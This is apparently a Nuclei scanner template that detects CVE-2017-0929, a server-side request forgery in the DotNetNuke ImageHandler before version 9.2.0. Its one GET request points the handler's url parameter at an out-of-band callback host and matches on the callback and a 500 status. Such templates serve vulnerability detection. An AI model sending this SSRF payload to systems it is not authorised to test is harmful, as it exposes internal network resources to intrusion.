id: CVE-2017-0929 info: name: DotNetNuke (DNN) ImageHandler <9.2.0 - Server-Side Request Forgery author: charanrayudu,meme-lord severity: high description: DotNetNuke (aka DNN) before 9.2.0 suffers from a server-side request forgery vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources. reference: - https://hackerone.com/reports/482634 - https://nvd.nist.gov/vuln/detail/CVE-2017-0929 - https://github.com/dnnsoftware/Dnn.Platform/commit/d3953db85fee77bb5e6383747692c507ef8b94c3 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-0929 cwe-id: CWE-918 tags: dnn,dotnetnuke,hackerone,cve,cve2017,oast,ssrf metadata: max-request: 1 http: - method: GET path: - '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}' matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: status status: - 500